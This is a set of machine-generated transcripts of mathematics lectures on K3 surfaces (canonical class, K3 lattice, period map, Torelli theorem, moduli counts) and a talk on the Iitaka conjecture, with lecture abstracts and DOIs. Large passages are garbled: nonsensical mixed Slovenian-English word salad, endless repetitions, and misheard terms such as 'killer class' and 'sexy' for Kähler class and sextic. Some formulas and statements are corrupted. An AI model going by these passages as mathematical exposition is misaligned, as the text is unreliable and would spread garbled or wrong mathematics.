times the canonical divisor is trivial. Now we have to think a bit about the canonical classes and also trivial. Okay, so we got 2 times the canonical classes trivial. What can we say about this? So 2ks is equal to 0. We want to show ks is equal to 0. So we cannot say so immediately. The thing that we know is that if ks is not 0, then you don't have a global section. So the way you forget something here, you will get also something here. And this is trivial. And we use now some computation in topology to compute the topological error characteristics of s. So compute now ktops, s. So let's do the computation. This is quite interesting because this will show us another property of k3 that we will see later. So you just use topology. So this is 2 times. This is a double cover that is ramified on c6. So the topological error characteristics of p2 minus I have to take away c6. And I have to add e here, r. So I replace topological error on k3. So it is an alternating sum of betty number. This is 3. So this is equal to 2 times 3 minus c6. So c6 is a curve of degree 6. So this is, sorry, I missed everywhere, p top, c6, top, I write it just like this. OK, this is 2 times 2g. Since it's degree 6, so the genus is 10. So this is 18. And I have to add the ktop of r. This is the same as a ktop of c6. So this is minus 18. So this is 6 plus 16. And we find 24, which is not strange, even. It's very nice, because you will see later that this does not change for k3. So we'll just claim that without any proof that all k3 are diffeomorphic. And in fact, so any time we will have 24. So this is 24. And how to use that? Well, let's use now the Nutter formula. So use now Nutter formula. Let's say I use that key of O s of the circular shift of s. So this is h0 O s minus h1 O s plus h2 O s. This is equal to 1 divided by 12 ks square plus the topological order characteristic of s. This is 0, because 2ks is 0. So the square of ks square is also 0. And so ktop s we computed is 24. 24 divided by 12 is 2. So this is 2. But now we have this. This is the dual of that. So this is 0. And this is 1. So I get that 1 minus h1 O s is equal to 2, which is impossible, of course. This is bigger equals than 0. So this is impossible. And this was this contradiction, or even contradiction, was coming from the fact of assuming that ks is not trivial. So this implies then. So we get that ks is equivalent to 0. And if you look again here, so ks is equivalent to 0. And if one looks again in this equality, we can do the same with this case. So you have 2 equal to this sum. So again, 2. So this tells you that the h1 O s is 0. And also that it's the same computation that q of s is equal to 0. So that we have in data k3, k3, which is a double plane. OK, so if one wants, and then, so I don't know how much time do I have? We started. OK, a few minutes. So I say just one thing, and then we stop it, because we start again. So, and in that case, just tell you if one wants to give an equation of a double plane. We will see maybe this example coming several times during the lecture. And just to give you an idea of the equation in this case, an equation for s is the following, t square equal to f6, 0 x1 x2, where c6 is the sexy gramification, sexy has this equation. And if you want, I see that in something in a weighted project space. So p3111, like this. These, of course, come from the double cover, and you see that the multiplication look, so again, is a sexy. So maybe I stop here, so I start again.
|
Aim of the lecture is to give an introduction to K3 surfaces, that are special algebraic surfaces with an extremely rich geometry. The most easy example of such a surface is the Fermat quartic in complex three-dimensional space. The name K3 was given by André Weil in 1958 in honour of the three remarkable mathematicians: Kummer, Kähler and Kodaira and of the beautiful K2 mountain at Cachemire. The topics of the lecture are the following: * K3 surfaces in the Enriques-Kodaira classification. * Examples; Kummer surfaces. * Basic properties of K3 surfaces; Torelli theorem and surjectivity of the period map. * The study of automorphisms on K3 surfaces: basic facts, examples. * Symplectic automorphisms of K3 surfaces, classification, moduli spaces.
|
10.5446/53768 (DOI)
|
Uno sa državcu, bo, še chang z kin아ba. Ne, glasba. Danes tak familiar, malo niedz antica? U moj je wovenj aquími in Wi-Leo isitating, semble se ga zDIOlectric se, li planto referrolling帶 is t Hajvar, večje, ko, nam perčamo, je nov doma na psycho, morajo bila se, danes po teboje, da je ball palkov Chunmu. Pozabal pas mega najbolj tega post view Arkano Povodili w čiske sp peanutov sezajno nämekva alle bo98, E8 in joарjebe katvije ga obč grosje v guzse confirmed. Editeto. Y구�mon llama dnutin. Pobora k poljesa. closestov. Ubal jaz električno spaghetti, muzeada jaz smoked chapter, kosjreamu loyget. Tonekigl o adrej leze. I有人. Jongones. Trybometers. basic facts on lattices. So just make a small parenthesis from k3 surfaces. So I will take L, a free Z-model, or a lattice, say, is a free Z-model. L is what we have seen for h2. We have seen it as not torsion and it's a free Z-model. With a symmetric bilinear form, so it's a definition, with a symmetric bilinear form that I will denote by B from L to L to Z. So I will always come with a bilinear form. And just some definition. So we say that that L is non-degenerate if the matrix is a m of B has a data m different from zero, which is all the k for me, will be always non-degenerate lattice. And we call, as often as done, data m in absolute value, the discriminant of L. OK, one should be careful with the discriminant group, but we will talk about that later. Then unimodular. If the determinant of m is equal to 1. And even if the bilinear form applied to x in x is to z, which for example is a case for k3 surfaces, what else. And otherwise we say that L is odd. And all the lattice. What else about definitions? The signature, of course, is a signature over R of N is the signature of B on L tensor R. And if L is non-degenerate, we denote it by s plus and s minus. So these are the positive eigenvalues, these are negative ones, so the one and the minus one. Then the notation again, if I write by L with a parenthesis m like this, this is again is the lattice L with the form of, let's call this B, m, x and y equal to m times B, x and y. I just multiply the form by a constant m. So m is, or B lm, maybe is better. m is, of course, non-zero, not real number, could be in z, non-zero. OK. Then we have the notion of isometry. So the last, maybe notions, and then we will see, anytime I need something, maybe I will deduce it later. So L1, L2 lattices. We say that these are isometric. If, oh, we have an isometry. If there is an isomorphism of z modules, let's say f, from L1 to L2, which respect the linear form. So such that we try to B2, so let's say maybe be even more precise. I will write the two lattices, L1, B1 and L2, B2, so I will precise the form. So B2 of, B2 of the image of f, x, f, y is equal to B1 of x and y. So it respect the linear form. And if L1 is equal to L2, equal to L, then we have the isometry of the lattice L, and we denote it by OL. O of L, and so it reads. OK, so just this terminology as I say, maybe we will see later some more properties. Let's now go back to H2, as we have seen, it is a freezing module, so that we have the first property. And it is in the lattice. So we have seen a as in, is a freezing module, and with the intersection pairing, the cut product. You go from H2, as you have seen, I read this in the lecture by Julian in Z. Let me write this in this explicit, alpha beta to the integral S alpha, which beta. OK, this is so this intersects, actually, the cut product, and this is unimodular, in kaj pa nekaj redak dualite. And so, with the intersection part, we have, OK, it is an under generate, and it is unimodular. So now we want to understand how to see that it is isometric to this direct sum. OK, we have to look at the signature. First of all, well, we have we note that is rank 22, model, we have seen that is of rank 22. So unimodular lattice, and we have for the signature that S plus, plus S minus is equal to 22. OK, the signature of L as in the definition is S plus S minus, OK. And then we need also a formula from topology that give us as the the trace of B, the actually the connection with the trace of B and the signature. So this is called the topological index theorem. Tensas that the trace of B which is equal to S plus minus S minus S minus minus 1 eigenvalue is equal to 1 third C1 square minus 2 C2 where C1 and C2 are the the chair numbers. So C1 is the first chair in class. So C1 is equal to C1 of S in the first chair in class and in this case is nothing else in minus the canonical divisor. So the first chair in class is the tangent shift, tangent bundle, but then you can do computation by use the chair in class, the property of chair in class is the minus canonical class. And cheese 2 is just the key top of S which is 24. So let us compute that. So we have that S plus minus S minus is equal to let's look at that. C1 square where we have seen several times in the canonical class square so is 0 minus and then we have 2 times C2 so 2 times 24 is equal to minus 16. And then it's easy to see if you put both together both the qualities together one gets that S plus is equal to C and S minus is equal to 19. So we have a unimodular lattice with this signature. Now we have to think about I will now show that that SZ is even. So again one should use a result from topology but so we have the following fact just take it as it is, so fact H2SZ is even and let me just give I would say justification of that just a bit of motivation. One can see that easily on curves only reusable curves so a curve is a class of the Picard group which is here inside so just one second and we have the genus formula on curves consider the genus formula for C in S irreducizible. So what does the genus formula say? When it says that the genus of C is not only for k3 but more in general is equal to 1 plus 1.5 C times kS plus C2 so this is 0 and so you get that C2 is equal to G minus 2 so this is clearly even so this is in 2z so one way maybe at least to have one motivation for think that it is even and it was occasion to show the genus formula that is very useful it give you the self intersection of all curves on k3 for example you see again that if your genus is 0 self intersection is minus 2 so it is a rational curve self intersection minus 2 and so on so we have resuming and even unimodular lattice in k319 so we use now result of Milner so classification of lattices so following theorem of Milner just formula like that so we have to erase all the black part following theorem of Milner take theorem of Milner so let l be unimodular in definite so this means that s plus is positive and s minus is positive then the following holds so so so so so so so so so so so so so so so so so so we have two cases so so so so so so plus minus 1 so m are natural number both positive because is indefinite so when I writing that is a writing this way it just rank one lattice with this biline form so just taking nothing else revektor to vida, hourly, Firewall, bench, Gaost justo v kanavdku. Z sila tvoj vredil hden razili嘛o mila nate len zunovek рядом v tako dije. Popas del, da so dne kab tests vey ze hidner per HTTP všそうだ ali neök je likesi whiskey pigeon tat in vaš enki E8. H in U and E8, je to izgleda, da je vzgleda, in h in k je vzgleda, vzgleda, h je pozitiv, bo je in definitivno, k je veliko, veliko, da je vzgleda, bo je vzgleda, bo je vzgleda, bo je vzgleda, je vzgleda vzgleda, bo je vzgleda, pi ko bom je, ki je tako, zblizavate. Street, mon, benあの ven aluminium zami sk into stare. Isre na Resas, inba pristen lampo 아니고, bi ki stavila? Analytics, inba ports. hati počfazila, je to najbolj, bo, esem si smet, a vsez Friday robbed mod errand ni regimentalist advice Vse pa nä обратno ne bo, da v s neighborsi denominatorove tatsächlich sais o Π� ve tampoco. with the only possibility and the rest, that is 19, which is 19, I get from E8, so E8 two times. And the interesting fact is that as I said, this does not. In héli ne skožem, da je unimodulnar, res je zelo v re groundu frav Запisi. Pretena sem si dashe kon Thanksgiving- z nachaj. Serial ko pa dive u počke večo SE Lučası SK-3정ar?... Lucy. Wa pa. Priplj �arko AFG. Šta razm carrya met�. Kaj strap. Tne job i svi Thanj laji smeha, ki mi se malo gustib tako ba' in kontroduzio vs. codinh s adam Iran. V aerobuja prepline valom glasba vad.two level h2, so reči nr by我們 hitrs. Nisih to je hrk pa diazir sstesse z bavno. Robлена je po speciesolec v vse in jo se pohvalite ali pozdajte kodfishnotí v dு. Zpravjajo, na etnih terbo in trhačenju je najvejske libko trollomofije barler. Hvala z batteries, sestje o thicker jazgi weil pospravite koliko pospojim ni veliko rovbu s te lovalimi barlerami. To pa ti je o 4 pod ze 20 judכfur以及 посмотреть. Z redu so kažат da je to zelo. Zelo je tudi. Zelo je. Zelo je. H00, H01, H10, H02, H11, H20. H20. H20. Zelo je. H21. H21. H12, H12, H12, H22. OK. This is one dimensional. OK. This is a zero dimensional. I put close to that the dimension. This is also zero dimensional. We have this one dimensional. This is one dimensional, this is a 20 dimensional. ki jih čepen遊戲, č Sea axle ko je začal dlatego se ru seats lege. Je tu ono.�przob 스타 tem, da se je poveda o delancobe lajli so pri bandej stybi je zarob takulto je se pred worksih tai. Tih strozi pa Vietnamizim- sbonagon je kompak Evitas. VI ti je tudi mu sp �oj, z nap,... ki oč depuis, lahko sem sa nesto se dobro, on je pričočne informacije, da ne nazv置кого večera. Zato je posledn picture, kateri. Amenoe trenoke. Ovari je vakata. Ono ga bizi narod Spectيرfod fartiko, ker jih pretizeme vse mi verja. Čus அailable aj882.Понимо, samo ni s pani dome 1. Terjadi sguardem bre Dameli assisted sa prizpe? 3. Pa prospečastmi res Bullach as delare �eness Human group. ne z принципе. in so about the projectivity of period map and totalitarian. I will more here. I will not prove that. It will take maybe all the time of the lectures, but give you some motivation where the period of AK3 lives and why to really so important, while I would like then to maybe start in today or tomorrow to talk about automorphism where you will see the power of totalitarian. OK, let's remark that. So we have seen, as I was writing here, that the fixed notation H0 omega2S, or OSKS, is generated by omegaS, which is this global holomorphic two form. Then the bilinear form on H2, this intersection padding, can be extended to H2Sc. I've worked at some point H2Sc, just H2Sc, then write by C. And let's compute the following. I'll do some easy computation. Take omegaS and the computer B, omegaS, omegaS bar. This is by the definition of this bilinear form, which is omegaS, which is omegaS bar. Well, now omegaS can be written in local coordinate as alpha times dZ1, where dZ2, alpha holomorphic. So when I write down again this integral, I get something positive. So dZ1, alpha square, dZ1, dZ2, dZ1 bar, dZ2 bar. What was saying again, although this morning by Julian, and this is positive. I have here just a volume form, so that's positive. And if I do the same computation, exactly the same way, with omegaS, omegaS, or just do the same, this is easily give you zero. So these are the conditions that one get on the two form. And also let's remark the following. So, if gamma is in h11, then of S, so it's a 1-1 class, then I can do the computation, b omegaS gamma is equal to zero. Just write down in dZ1, dZ2 bar, et cetera, and you see that it's zero. So this implies that h11 is orthogonal with respect to the linear form to h20 plus h02. So remark here that I make a direct sum as a vector space, but these two are not orthogonal for the pairing, because I was showing there if I do b omegaS, omegaS bar, it's positive. So it's orthogonal with respect to the linear form v h1. So the period. So my period, omegaS, which is the two form, is called the period of the k3. So I will say the two form of the period is same. So the line p omegaS, let's say the class of omegaS, which is nothing other than the line, is p omegaS, belong to the following space, belong to the projectivization of, I have to introduce the marking, well, I will do it later, of h2SZ. Let's write it this way, tensor C, so we never forget somehow that this is a lattice. So I will write just b omegaS, omegaS, just write down as omegaS, omegaS, forgetting the b at some point. It does not matter, I mean it's always the same linear form I take. So this is equal to zero, and omegaS bar is positive. And now we have to introduce a marking, because somehow, well, this h2 is still some sense attached to my k3. I would like to forget that in some way, and go to the lattice lambda k3. So let's define now a marking, so that we go to the direction of period domain, well, the period domain is somehow already here. Definition, so a marking, S is over the k3, a marking is the choice of an isometry, phi from h2SZ to lambda k3. U lambda k3, ase je k3 lattice, so it's 3 copy of u, and 2 copy of u. OK, so with the marking, we have then the following. So that this gives, if you go to the complexity file, so you have a phi, that maybe sometimes one put a small c here, but I will forget almost at the time, so to from h2SZ to lambda k3 tensor C, and to your class of omegaS, associate the image there. Phi of, or maybe just write, just to recall, just c omegaS, this line, omegaS. So, you have to say to your two form that you have on the k3, this point in this space. And even more, I will just consider in line, if you remember, in fact, these two form is uniquely determined up to constant, so why actually you take always this multiple? So, in this way we get the following. So, let omega, I will call it that way, is a set of points of p lambda k3 tensor C. So, remember, this is a p, this is rank 22, this is a p21, such as that omega, omega bar is positive, omega, omega, or sometimes we don't just write omega square is equal to zero. And if you look at the dimension of this period domain, so this is what we call period domain, so this is a p21, this give you an equation, it's a quadratic, and this is an open subset. So, even more, let's write in the following way, this is the set. So, let's call this the point Z0, Z21, so is the point Z0, Z21, so we have to make it explicit, such that you have Z0 square plus Z1 square plus Z2 square minus Z3, 21 equal to zero, and Z0 square, this is the first condition, this is the second condition, so this give you the quadratic, sorry, and this is the first one, et cetera. So, you see, well, this is an open subset in the analytic topology of a quadratic. Of a quadratic of p21, so this modular space is 20 dimensional. And, well, as I did the computation before, 4k3 surface, phi of c omega s, belong to this domain. So, by the computation we did, if for sk3 surface with marking phi, we have that phi of c omega s belong to this omega, to this space. So, taj is a period domain of marked k3 surfaces. Ok, so, for the moment you cannot get rid of the marking, we will talk about that in a moment. So, not only this is true, it is not only true that the two form is a point of this omega, and the relativity of the p-ron map, map. cas si, ki Rapha Modeljeopolo katya, ale tukaj sem z реagsByeok vaccinationi. In z o� The 나왔ism. 1 minus. Zob multi. As phii,. Such that is omega is a period. So, okay, three Energ physical fell, let s gamble, as e. Th creative sulfane s phiiежде taklah s요č vet vsi bo comega s infot셨어요zmannost. nombre-tučλε tukaj ne셨al vz victims 받고val Быl iz grease- z ultra. appointmentMe neование. Ze sr Subscribe vegan raisay svab, kako eating pr��고 ikaz, ko prelič 먹어. nesse, dokxe pravega odleda, ta med bluetoothna add耶 Chris. za zdaj. A bo wists Veliko pag brightness. In packagesin tvoji hradci beанеje tudi smiti na epic jevenje s precisely primer v Jebara omega s is equal to omega. In tudi v p-prime c omega s prime is equal to omega. Zelo se zelo izgleda. Zelo se zelo izgleda. Zelo se zelo izgleda. Zelo se zelo izgleda. Zelo se zelo izgleda h2 sz tudi lambo k3. Zelo se zelo izgleda. Zelo se zelo izgleda v tudi lambo k3. Zelo se zelo izgleda h2 sz tudi lambo k3. Kaj si nekaj je zelo izgleda? Spor da, zelo se zelo izgleda. w redu kakoldela od petroni. Gobet nistica bil 이야기 to veče. Dobet k sobim, posいただ račna dio, no, ne ambition.mandigran deserted... po dve stem notch Ign. Ne. La spečいます, ne isplovite complet400, no, v slip od vendti mletov, ch2 London L8 B is anizometry. In ovo察skih čestvetku, ki bomo rečili, bibe mi je zelo boljen na po Christieom kštane, V 같아요 z tåj merci in je je všоко... c konl exempli, ček amegas mač v wSe v Ročavori, O orderovaliSinging mechanism z Bibelitanjeacova vo skupov arendi z smigningaar metronomične Armor in swine ml transcupovatelje. Ano sp Nature saivno od Editno eden Mat seračne in kot je booth po blocks nuh poFantarmanj, bo dotidole美元inkar ne Live deposas Manager. ki zbukan tako ki nama ne stops demo so vidim skol awake to raliteremurt. Tako da cellphone det. sodasmo se pozdi, that s isomov do s prime by the following theorem, which is a victorally. So, take s isomov do s prime, so s prime arcitri. Tis efin oliv, there is isometry, phi from sz h2 s prime z, szeče zet isometry, szeče zet period of the first one is equal to the second one. An isometry with this property is called hodge isometry. So, it preserves in particular so the hodge decomposition if you go on c. So, this tells us that up to the marking the k3 is unique. So, on a point what can you change, actually you can only change the marking, but not the k3. And I will give you in a minute also the strong torelitir that say even something more, more or fee. You can even more establish a connection between this visizomorphism and the isometry that you have here. But let's do maybe first some remark. Because at some point maybe In envelope ne se očetilo si ljudi kladune. Nato uzoveste, dernière začel sinko kat. kateri polega. Svoljko ili so svoje však t least, ki nоде v устройce Trinsky inštol izstavlите flags. Serajo nene, pogledaj biti v Killeh. Zичati si da se rovizo. Je z v risks, tvoj, posbijake sveti tvoj L k3. Teba,éré make in to v bistvu poworkil in je ocijno vsato izarel. Beliste maeš zbit提 lls. Znač virt Metriscu si z njen RomanQué, ZačLinkam jer realitだけ pos cards naj好吃nren, ke Bobobutšče prot heavily.. TVz drecov ljubov, pa v istatni hoditet sk здоровoziękujvingi, skcucovali naj locosen, kaj grape več, k3 v 대박u. Oveniga moこれで markedovana spjeda koritνiko v jad investigated, pravno tako da eel nje, prezenovalo več in tenantskelPR začučala, gre bar nysi perspectives. Tvoj je peč smells designed tako forlič Kimchi's, tako je šteές pre F ו K3ščno pr有點, ud Love K3 is a mi ne Lee Cancanh car Herbal tisto povjučité zvor clouds in božistima. Po comfortuonse ponjeniteo jsute iy即 pouorte zcepljene, im debiti k gr modelsom No. Tiss cam na œro wave vse z uk K3 utчero Guru. Pad mainland. Jel.�동. z tele��语adi pa za batterij ni reported in izgledaj previč, pa pos80, ka je teško aboveizin sinkτικo. So, vem�를 soank nagrafo in sem je ne tukaj relacirao ki noselo, albeit pa našdi ispe, z ekveni z ga sowultkiri platino, b resign zažal lengi in z otroz來 in in ki so majst Boo 2000 za konc темпер coolestu ne spole nagroniente in to so je to, iz natetensione. Kako čest wenn spi Geram raisaz me izvanjezat, Vse vst Schutz Blockchainχ tak dne v flej masato skrhu z pletkov installovanje in synem rota suit. Veliko ktoraz ktire intro su envision. Pa iz speaksim je ja dajštavno! Asi jih v tom locatedi tra Rot AngryCar 겁ne! V kosku na stranové in perceplje dusamast kompon off 來 šetka. shampoo je pomej basic. tha do p Lorda na s 보이čne obice recommend snila variable v zep Tako le пол accepting To je tako c они compounds so in typik tega pomoč vainteize, a ve Sad ta ni pon잖아요Thank you Tom ser Int 可以 If you know, au revention the Od casualnon sprine edit How Jerаете ki ju coputila s teb gledaj. Al informacije pristata Karma, spido občindre mef visually spoken. Praten super. Sko relevantno ponoriginalno kot zubik, So, there are different way to say that. Let's say that it sends a killer class to a killer class or to preserve the killer cone. Send the killer class to a killer class. Or, sometimes, you find the killer cone to a killer cone. This is equivalent. So, you have an effective isometry. And that's all. Then there is a unique. Then we have a unique isomorphism between s and s prime, such that if you look at the action of the lattice, it's exactly equal to sigma. So, then there is a unique f from s to s prime isomorphism. Or, let's say, s prime to s. And, let's say, this is a unique isomorphism. So, the f, such that f star from h2 sz, from h2 h prime z, f prime is equal to sigma. And, let's say, this isomorphism is uniquely determined by sigma. So, if you look at the theorem, then any time, in fact, you have an isomorphism of k3, you have this condition. So, the isomorphism is that properties. We have this condition. So, different with the victorelli, is that you have that. And then tell you, somehow, where your killer class goes. There, I cannot fix that. So, I can have the killer class is in one cone and does not go into the other killer cone. So, that's, I have to apply some reflection to get the isomorphism. But here you cannot roll it because you say that I want the killer class to, again, to the killer cone of the other k3. And, somehow, we will see application of this, to reality theorem. So, to reality theorem has many, many important application. But for us, let me just state as we mark. So, to reality theorem has an important, even fundamental application. In the study of automorphism of k3, of out s, which is the set of f from s to s, such that f is biomorphic, for example, or b irregular if you want. Because, replace there s prime by s, then somehow tells you that if I can construct hodja isometry with some special properties, then I can say something about automorphism of the k3. So, in particular, knowing some properties of lattices, isometry of lattices, give you back some properties of automorphism of the k3. Let's maybe, so I hope I will maybe start today, talk about automorphism. But I just wanted to, for a moment, just to come back to the fact that I was writing there that if you consider only projefik k3, the modular space is 19 dimensional. So, let me do some example of how one counts modular. So, let me convince you that 19 is a good number of modulator that one can expect for projefik k3. Tomorrow in the exercise section, for example, you will have to do some exercises in this sense. So, some examples of dimension counting for k3. As I said, it s a good exercise to do, because we do it with surface that you already know. We have seen a lot of geometric examples. You have seen the quartic, you have seen the complete intersection, 2-3 and 2-2, the double plane. And then we will see that all these examples are 19 dimensional. So, take k3 quartics in p3. So, these are for generic quartics, k3. We have seen our example, the easy example we gave at the beginning. So, the space of quartics, so a quartic in p3 depends on, well, you can remember how to want, so just take a, I remember this way, the commology, 0, p3, 4. This is the space of quartics of p3 with a big h, this is the dimension. So, this is 4 per 7 over 5. So, it s 5 times 6 times 7 divided by 6. But if you consider all the quartics, you are not very happy, because of course you can apply a projected transformation that sending a quartic to another one. So, these somehow are equivalent. But consider projected transformation. And so, the dimension of, as an algebraic group of p, g, l, 4c or 3c as you want, I don t know how. So, this is 16 minus 1. So, this is a projective dimension. And so, if here I write the projective dimension is a, is 35 minus 1 equal 34. So, the number of moduli for quartic in p3 is, well, the dimension of this space, which is 34, minus 15, which is very happy comes back to be 19. And you can do very similar computation. So, one can do a very similar computation. So, remember, I wrote s 2 3 in p4, this is a complete intersection, s 2 2 2 in p5, and s double plane of p2, and always get 19. So, this cannot do that. Well, for kumar, you can do that, the computation. But kumar are not so generic. It s not so really, well, kumar has a high picarnam, because you have a lot of curves. So, it depends. The moduli space is much smaller, somehow, very special. But this is get always 19 moduli. And then after the break, I will tell you a bit about the moduli spacing in that cases. So, let me tell you a bit about the moduli spacing. So, let me tell you a bit about the moduli spacing.
|
Aim of the lecture is to give an introduction to K3 surfaces, that are special algebraic surfaces with an extremely rich geometry. The most easy example of such a surface is the Fermat quartic in complex three-dimensional space. The name K3 was given by André Weil in 1958 in honour of the three remarkable mathematicians: Kummer, Kähler and Kodaira and of the beautiful K2 mountain at Cachemire. The topics of the lecture are the following: * K3 surfaces in the Enriques-Kodaira classification. * Examples; Kummer surfaces. * Basic properties of K3 surfaces; Torelli theorem and surjectivity of the period map. * The study of automorphisms on K3 surfaces: basic facts, examples. * Symplectic automorphisms of K3 surfaces, classification, moduli spaces.
|
10.5446/53775 (DOI)
|
Okay. Thanks a lot for the invitation. So today I will explain a joint work with Mihaly So it's essentially an application of the productivity of the image which he explained which he has explained before. So to begin with in the first part introduction, I will first explain a little bit what is the Itaka furniture and after that I will explain what's our main theorems. So to begin with I first record the definition of Kodaiyara dimension. So to begin with we assume that x is a projected manifold defined over c. It also holds in the compact color case. In this case for the Kodaiyara dimension, kappa x is defined as follows. If the k-ac cannot bundle of x is not creative, it's not creative. In this case we define the kappa x as equals to minus infinity. If not, if this one is a creative saying in this case the kappa x is defined as the largest number d such that once we calculate the dimension of the global section over x of the current bundle tensors of times divided by m. So in the case one this one is not equals to zero, so in this case we define the Kodaiyara dimension of x is the largest number d such that for the dimension it's really positive. So one remark here is that and so a very simple remark here is that so in this case by the monarchy it's easy to see that in this case the kappa x should take the values minus infinity 0, 1, 2 and 2 the dimension of x. And also another remark is yes that if we replace the kappa bundle x by a line bundle by a homomorphic line bundle, line bundle over x so by using the same definition here we can also define the kappa error with respect to error. We just replaced the kappa kappa by the line bundle error here. And so for this one we call it's the Itaka dimension of the line bundle error. So now I can explain what's the Itaka conjecture. So for the Itaka conjecture it says as follows. So letter p via fibrillation, so I explain later what the fibrillation means between two projective manifolds x and y. And so for the fibrillation here I just means that she has a projective and the fiber and the fibers are connected. So for the general fiber is so in this case since we have set it smooth so in this case so for the general fiber is a smoother connected manifold. So in this case the Itaka conjecture states that in this case we have the sub-adjectivity of the correct dimension. So in this case it's conjectured at kappa x here is much bigger than the kappa y plus the kappa f. So where the f is the general fiber is the general fiber of the fibrillation p. So that's the Itaka conjecture. So there are a lot of thoughts about the Itaka conjecture. So here I just so here I just just a little bit. So in the case one the dimension of y is equals to 1 in the case the base years of dimension one it's solved a long ago 40 years ago by Kamata. He proved that in this case the conjecture holds and also another extreme case is in the case one the fiber one the fiber f years of general type of general type. That means set the kappa f years the extremo in this case for this conjecture it's also solved by it's also solved by Kola and also there was another proof by Fieberg and also in the case one f years of log general type case it's of log general type case. So in this case it's also same this case for this conjecture it's also solved recently by Kovac and Pata. And yes so here yeah so there is also another very important relater which is due to Kamata. He says that f for f at the midter a good minimum model minimum model sets means that sets means that so for this fiber it's biogenally equivalent to your manifold so for the fiber is biogenally equivalent to a variety of such that it's kind of the window is some example in this case Kamata proves that it holds Kamata proves that the conjecture holds so in particular so in particular so in particular abundance conjecture so in particular abundance conjecture implies the attack conjecture. Yeah so so now I can explain our result so for our result we prove that yeah so maybe I need that also to say that there is also so there is also so there is also another more simple proof or prove that by a little better simple proof by a proportionella and also there is a former worker due to Chen and the Haken we can prove the following since and yes so if set up so later at P yeah fibrations yeah fibrations between between two projective manifolds and the letter and now we consider a KLT case that to be a KLT if at the advisor on X so in this case yeah for yeah for so in this case yeah for yeah for the base is a billion variety if it's a projective polys saying this case we can prove that for the high dimension of this one should be at least the the current dimension of the fiber plus the restriction of the pair on the general fiber plus kappa y and so in this case the same so in this case the same so why is a billion variety so we know that for this one it equals to zero in fact and yeah and the and and and the biasing and the biasing document and biasing document and the biasing that argument that developed so biasing document developed in our paper we can also prove another router so so we can prove another router yeah set if for the base yes if the base yes dimension equals to two so in this case we can have also this equality so you try improve a little bit the result of karma saying this yes no no no tenness as way so I see no no no so so so yeah for you in this case so in this case yeah for straight away in this father since ever since ever since ever since ever we take it to be the junk fiber so in this case from this one equals to zero so in this case by by so in this case by using our two windows that this one is much bigger than this one and if we add a pair it has more more sections yeah so so yeah so for the proof of our router so for the proof of our router it's based on the worker so for the proof of our for a lot so it's based on a lot of folks so for the proof of our reality it's based on the productivity of the relative kind of bundle which is already explained in the talks of me hi so in the second part I just record briefly so in the second part I just record briefly what he has explained in his course so single party is the productivity of the relative kind of window and also the productivity of the direct image so here we take a so so here we so for the end here we take a n to be a number and then maybe we assume certain and and maybe we assume set the m e as much as and true and and we assume set for the direct image is not equals to zero that's just a means to set a set that's just a means that a fall for sets means just set just means that a four generative point in why for this dark image here yeah yeah yes sorry so so so so for our proof so for now on so for now on so for now on we just assume set up for the pair data equals to zero so for the reason of simplicity so in the general case for the proof it's almost the same proof as before so far now for simplicity we just assume that the data equals to zero the general proof will be essentially the same proof so in this case so in this case it's not equal to zero the sets just means that for the gem here which is equals to this one yes not equals to zero we have at least one section for every for generic fiber same this case same this case so maybe I just recall thanks to Bob Watson and he has already explained in his course in this case we said that we can find a so-called data m so-called the m relative for m backman kernel type matrix kernel type matrix which we write here as the edge B on the relative kind of window such that once we calculate the curvature of it it might be a singular matrix in this case it's a curvature is semi-polytive for on the total space of x in the sense of current yeah I need to recall that's also so so so I just say a particular side x the recall a little bit of set up so I just explained a little bit of set up so by the definition here so the restriction of the dysmetric on the fiber on a generic fiber is constructed by yes constructed by by the sections yes constructed by the sections of this one yeah so for the so for the construction so I think that is already explained by me hi and I need also another router which is also proved by and which is also proved in his paper in his paper with both and that's a set it's proved by hi and Takayama still in this setting still in this setting and now we take a we just take air to be the m minus one take kind of window and on air we equipped it with the matrix as as the HB so HB is on the relative it should tensile m minus times say in this case say in this case say in this case let let y1 in y be the be the locally free free locus of the direct image plus air which is equals to the to this one because apioki for this dark image is just a coherent shifu so we just take the locally free locus of it so for the complementary is of could measuring at least two in y let y1 so let y1 be the locally free locus of it and and the vector y zero in y1 yeah we can prove so uh so yeah so yeah so so that so so that y zero be the smooth locus be the smooth locus of the vibration p that's just the main set of for mb fiber over y zero so for the fiber so so for the fiber is smoother and the by and the by and by the inverse of the shunher window center is in fact included in y1 so so so let y be this one say in this case say in this case they prove that the Ix is a possible so so the Ix is a possible single metric possible singular matrix which is coded which is related to the nashimha matrix on the direct image so here we just defined over the locally free locus on this one such set such set this one such that so for this possible single metric so for this possible single image here it's not necessarily smoother but it's in fact bounded but in fact it's bounded on y zero and and it's positively curved in the sense of a griffith y1 so so so for this one that's uh so for the productivity of this one I don't know if it's already explained the you you have already explained okay yeah so so yeah so so maybe I just explained a little bit of the construction of for h maybe I explained that a little bit the construction of h so under so so let y be a pointer in y zero say in this case so let y be a pointer in y zero so in this case so so for the dark image here we know that it's just equal to this one so therefore we want to define the metric on this space how we define it we take a section here say in this case you wish I'd have defined the metric h it's defined as the integration of the section s and with respect to hr yeah so in this case we know that for this one it's a volume form and by the construction of and by the construction of the backman chronotype metric it's easy to check set up for this one it's finite so therefore that's it's plain set up for this metric it's in fact bounded on y zero so and so and and so therefore we know that for this metric here it's in fact bounded on y zero and after set and after set we can prove that and after set we can prove that in fact we can extend the metric as a possible singular metric on y one and so and so for the notion of for weakly positive curve that's just means set and so for this one here's the weakly positive curve that's just means set on on y one that's just means set that's just means set for uh that's just means set uh that's just means a letter e be the dual yeah that's just a means that for every open set for every open set in y one every open set and for every open set uh for every open set uh for every topological open sets in y one And every section in the dual of this vector bundle, here we know that also for every section here, we see that it's weakly semi-partitive. So we see that it's weakly, we see that it's polydiped in the sense of gray surface. That just means that for every topological bundle set in Y1 and every section here, so in this case, we can consider the function log S. So here we take the dual of this one. So therefore, we should take the dual of this matrix. Yes, PSH function. Yeah. Yeah. Because we know that Y1, because we know that Y0, it might be a straight thing subset in Y1. So in this case, by the construction here, we know only that for the matrix H here, it's bounded on this set. It's bounded on this set. So on the complementary in Y0, it might be infinity. But for this definition, it still holds. And one more remark here is that if in the case H here, smooth, if the matrix is a smooth commission matrix, in this case, for this notation, it's your current to say that it's positively curved. It's positively curved. It's your current to say that it's gray surface semi-quality. It's gray surface semi-positive. Yeah. So that's the explanation of the result of Mihaly and Takayama. And as a color, by using a lot of roof feed, we know that in this case, actually, in use a matrix, we write as determinant H on the determinant of the draft image. And in this case, since it's of rank 1, we can take the double dual. It's a line bundle on the 